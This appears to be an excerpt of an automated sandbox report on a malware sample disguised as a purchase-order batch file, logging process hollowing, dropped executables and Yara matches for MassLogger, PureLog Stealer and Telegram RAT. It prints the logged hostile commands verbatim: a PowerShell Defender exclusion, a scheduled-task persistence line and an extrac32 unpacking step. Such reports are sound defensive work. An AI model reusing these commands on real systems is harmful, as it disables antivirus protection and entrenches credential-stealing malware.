Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'			Jump to behavior

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: C:\Users\Public\Libraries\rpkhzpuO.pif base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Memory allocated: C:\Users\Public\Libraries\rpkhzpuO.pif base: 400000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Memory allocated: C:\Users\Public\Libraries\rpkhzpuO.pif base: 400000 protect: page execute and read and write

Sample uses process hollowing technique

Source: C:\Users\user\AppData\Local\Temp\x.exe	Section unmapped: C:\Users\Public\Libraries\rpkhzpuO.pif base address: 400000	Jump to behavior
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section unmapped: C:\Users\Public\Libraries\rpkhzpuO.pif base address: 400000
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section unmapped: C:\Users\Public\Libraries\rpkhzpuO.pif base address: 400000

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory written: C:\Users\Public\Libraries\rpkhzpuO.pif base: 3B4008	Jump to behavior
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Memory written: C:\Users\Public\Libraries\rpkhzpuO.pif base: 2B5008
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Memory written: C:\Users\Public\Libraries\rpkhzpuO.pif base: 27B008

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /y "C:\Users\user\Desktop\PO#5_Tower_049.bat" "C:\Users\user\AppData\Local\Temp\x.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Users\Public\Libraries\rpkhzpuO.pif C:\Users\Public\Libraries\rpkhzpuO.pif	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process created: C:\Users\user\AppData\Local\Temp\Microsofts.exe "C:\Users\user\AppData\Local\Temp\Microsofts.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 14:45 /du 23:59 /sc daily /ri 1 /f	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe"	Jump to behavior
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process created: C:\Users\Public\Libraries\rpkhzpuO.pif C:\Users\Public\Libraries\rpkhzpuO.pif
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process created: C:\Users\Public\Libraries\rpkhzpuO.pif C:\Users\Public\Libraries\rpkhzpuO.pif

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	4_2_027C5A78
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: GetLocaleInfoA,	4_2_027CA74C
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: GetLocaleInfoA,	4_2_027CA798
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	4_2_027C5B84
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: GetLocaleInfoA,	7_2_00417A20
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: GetLocaleInfoA,	7_1_00417A20
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	14_2_02835A78
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Code function: GetLocaleInfoA,	14_2_0283A798
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	14_2_02835B83
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: GetLocaleInfoA,	18_2_00417A20
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: GetLocaleInfoA,	18_1_00417A20
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	20_2_02805A78
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Code function: GetLocaleInfoA,	20_2_0280A798
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	20_2_02805B83
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: GetLocaleInfoA,	23_2_00417A20
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: GetLocaleInfoA,	23_1_00417A20

Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Microsofts.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Queries volume information: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_027C9194 GetLocalTime,

4_2_027C9194

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_027CB714 GetVersionExA,

4_2_027CB714

Source: C:\Users\Public\Libraries\rpkhzpuO.pif

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected MassLogger RAT

Source: Yara match	File source: 7.2.rpkhzpuO.pif.26b1cfc0.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rpkhzpuO.pif.26b351f0.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rpkhzpuO.pif.26b351f0.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.Microsofts.exe.b70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rpkhzpuO.pif.26b4d410.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rpkhzpuO.pif.26b4d410.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rpkhzpuO.pif.26b1cfc0.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000000.2098416455.0000000000B72000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2137347669.0000000026B04000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rpkhzpuO.pif PID: 6480, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Microsofts.exe PID: 6004, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED

Yara detected PureLog Stealer

Source: Yara match	File source: 23.2.rpkhzpuO.pif.30640000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.rpkhzpuO.pif.30640f08.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rpkhzpuO.pif.257b4e5e.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rpkhzpuO.pif.1ebd3d90.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.rpkhzpuO.pif.2de54e5e.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rpkhzpuO.pif.1ebd3d90.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.rpkhzpuO.pif.2de53f56.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rpkhzpuO.pif.1eb95570.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.rpkhzpuO.pif.2f0a3d90.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rpkhzpuO.pif.26ac3d90.15.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rpkhzpuO.pif.1d813f56.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.rpkhzpuO.pif.2f065570.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rpkhzpuO.pif.1eb96478.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.rpkhzpuO.pif.23be07b8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rpkhzpuO.pif.26a86478.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rpkhzpuO.pif.1ffd0000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.rpkhzpuO.pif.2de53f56.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rpkhzpuO.pif.257b3f56.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rpkhzpuO.pif.1eb96478.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.rpkhzpuO.pif.2f066478.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rpkhzpuO.pif.1d813f56.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rpkhzpuO.pif.27f00f08.17.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rpkhzpuO.pif.28640000.18.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rpkhzpuO.pif.26ac3d90.15.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rpkhzpuO.pif.27f00000.16.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rpkhzpuO.pif.27f00f08.17.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.rpkhzpuO.pif.2f0a3d90.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rpkhzpuO.pif.1d814e5e.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rpkhzpuO.pif.28640000.18.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rpkhzpuO.pif.257b3f56.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rpkhzpuO.pif.200d0f08.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rpkhzpuO.pif.27f00000.16.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.rpkhzpuO.pif.30c70000.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.rpkhzpuO.pif.30c70000.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rpkhzpuO.pif.200d0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.rpkhzpuO.pif.2de54e5e.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.rpkhzpuO.pif.23be07b8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.rpkhzpuO.pif.30640000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rpkhzpuO.pif.26a85570.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rpkhzpuO.pif.1eb95570.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rpkhzpuO.pif.200d0000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.rpkhzpuO.pif.2f065570.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rpkhzpuO.pif.257b4e5e.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rpkhzpuO.pif.1d814e5e.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.rpkhzpuO.pif.30640f08.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rpkhzpuO.pif.200d0f08.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rpkhzpuO.pif.1ffd0000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.rpkhzpuO.pif.2f066478.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rpkhzpuO.pif.26a86478.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rpkhzpuO.pif.26a85570.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2139671913.0000000027F00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2390210005.000000002DE13000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2130466742.0000000025773000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2332577870.000000001D7D3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2351778016.00000000200D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2390829078.000000002F065000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2137347669.0000000026A85000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2145721948.0000000028640000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2351518623.000000001FFD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2391691150.0000000030C70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.2168298227.000000001BAB2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2390995054.0000000030640000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2351220430.000000001EB95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2066777727.0000000023BE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.2278096725.000000002C1F3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 7.2.rpkhzpuO.pif.26b1cfc0.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rpkhzpuO.pif.26b351f0.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rpkhzpuO.pif.26b351f0.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.Microsofts.exe.b70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rpkhzpuO.pif.26b4d410.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rpkhzpuO.pif.26b4d410.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rpkhzpuO.pif.26b1cfc0.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000000.2098416455.0000000000B72000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2137347669.0000000026B04000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rpkhzpuO.pif PID: 6480, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Microsofts.exe PID: 6004, type: MEMORYSTR
